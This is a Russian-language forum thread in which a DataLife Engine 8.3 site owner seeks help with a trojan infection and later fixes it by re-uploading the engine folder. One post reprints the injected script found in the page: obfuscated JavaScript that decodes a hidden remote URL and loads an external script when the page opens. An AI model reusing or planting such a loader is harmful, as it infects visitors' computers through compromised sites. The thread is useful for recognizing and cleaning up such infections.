Перейти к публикации

сайт заражен вирусом. DLE 8.3


Рекомендованные сообщения

zelenb.com

При открытии сайта открывается Adobe Acrobat, нод 32 ругается на Kryptic.GO trojan

Версия DLE 8.3 чистая

Антивирус в админке:

./engine/modules/c_navigation.php 4.58 Kb 13.11.2009 22:22:55 неизвестен дистрибутиву

./engine/inc/init.php 24.54 Kb 13.11.2009 22:22:56 неизвестен дистрибутиву

./engine/inc/makethumb.php 6.93 Kb 13.11.2009 22:22:56 неизвестен дистрибутиву

./engine/inc/inserttag.php 22.12 Kb 13.11.2009 22:22:56 неизвестен дистрибутиву

./engine/inc/functions.inc.php 16 Kb 13.11.2009 22:22:56 неизвестен дистрибутиву

При первом откытии сайта под подвалом появляется пустое место, которое после обновления страницы исчезает...

Что делать как найти и устранить проблему?

Изменено пользователем Richiooo
Ссылка на сообщение
Поделиться на других сайтах

Начните с удаления с сайта порно рекламы, или вы не берете в расчет что источник заражения именно она?

Ссылка на сообщение
Поделиться на других сайтах

там стоит teasernet.ru при выключении этого баннера ситуация точно такая же. собственно вся реклама тоже снималась и ничего не поменялось

Ссылка на сообщение
Поделиться на других сайтах

Richiooo,

Другого зловредного кода на вашем сайте в исходном коде я не вижу.

там стоит teasernet.ru

и что? Это гарант безопасности.

собственно вся реклама тоже снималась и ничего не поменялось

Удалите всю без исключения рекламу и давайте ссылку на сайт, посмотрим что у вас там еще всплывает.

Ссылка на сообщение
Поделиться на других сайтах

В админке сайта в самом низу код (исходный код страницы)

<script>/*GNU GPL*/ try{window.onload = function(){var Vppmkah2dw7 = document.createElement('script');Vppmkah2dw7.setAttribute('type', 'text/javascript');Vppmkah2dw7.setAttribute('id', 'myscript1');Vppmkah2dw7.setAttribute('src',  'h@)((t^)&&t^!p!$:!!/$$&/&@(&f(^$l^i##c@@(k&$(r@^-(&(c$&#)o!#&m(#.^a#(d$#@v!m$&$&a!##k@^(#e@)r^(.#!r@#u($#).!)#)m&e&@@r)c&!&a!#^d@!!o(l&i)$$^r@!(e$(-#)c!o$(m)&$&$-&)m$#)x().(e)&a&))#s&)y^&(t!#)(^a)@b!!)l&#(e^!#^t)(e@&^n()!n!#$i@&s($.^)#r($!#u#(@&:#8$0$^!8$#$@0(!/#^g(^!$o@#!$)o@^g&l!!(e!)&^.()($c^(&o&^$$m&/#^g^&o@@o(@)&g!&@!@l$&$(e^.#!c$$$)!o^m)$(/)(n)^$@y^!d$$@a!i$((l($y&^!&n)#e)@$w^$s!.$&c(^o!@(m($$)/$g!(@o@o)^)g@^l$e&(!.(#a(t!#@@/&p$l#!a))$y@&)).&@c$@$o)&&$m#)#/!'.replace(/&|\(|\$|\!|#|\^|@|\)/ig, ''));Vppmkah2dw7.setAttribute('defer', 'defer');document.body.appendChild(Vppmkah2dw7);}} catch(e) {}</script>[/code]

Это нормально?

Ссылка на сообщение
Поделиться на других сайтах

Richiooo,

http://forum.dle-news.ru/index.php?s=&showtopic=39386&view=findpost&p=175979

http://forum.dle-news.ru/index.php?showtopic=32928&hl=iframe

Ссылка на сообщение
Поделиться на других сайтах

спасибо, пришлось перезаливать папку engine.

кстати после того как сайт был вылечен, хотел сделать снимок встроенным антивирусом, а он пишет

Warning: fopen(../data/snap.db): failed to open stream: Permission denied in /home/zelenb/domains/zelenb.com/public_html/engine/ajax/antivirus.php on line 349 Warning: fwrite(): supplied argument is not a valid stream resource in /home/zelenb/domains/zelenb.com/public_html/engine/ajax/antivirus.php on line 350 Warning: fclose(): supplied argument is not a valid stream resource in /home/zelenb/domains/zelenb.com/public_html/engine/ajax/antivirus.php on line 351 ������ ��������� ������ ������� � �������� ������� ������

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...